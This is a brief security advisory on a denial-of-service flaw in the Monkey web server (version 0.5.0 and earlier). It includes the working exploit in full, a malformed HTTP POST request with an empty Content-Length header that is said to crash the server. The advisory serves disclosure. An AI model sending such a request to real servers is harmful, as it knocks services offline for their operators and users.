‘Bug in Monkey Webserver Causes DoS (POST)’

Summary

‘Monkey is a Web server written in C that works under Linux. This is an open source project based on the HTTP/1.1 protocol. A security vulnerability in the product allows remote attackers to cause a denial of service attack.’

Credit:

‘The information has been provided by Daniel.’


Details

Vulnerable systems:
 * Monkey version 0.5.0 and prior

Exploit:
Sending the following:

POST / HTTP/1.1
Host: 127.0.0.1:2001
Content-Length:

Will cause the server to crash.’

Categories: UNIX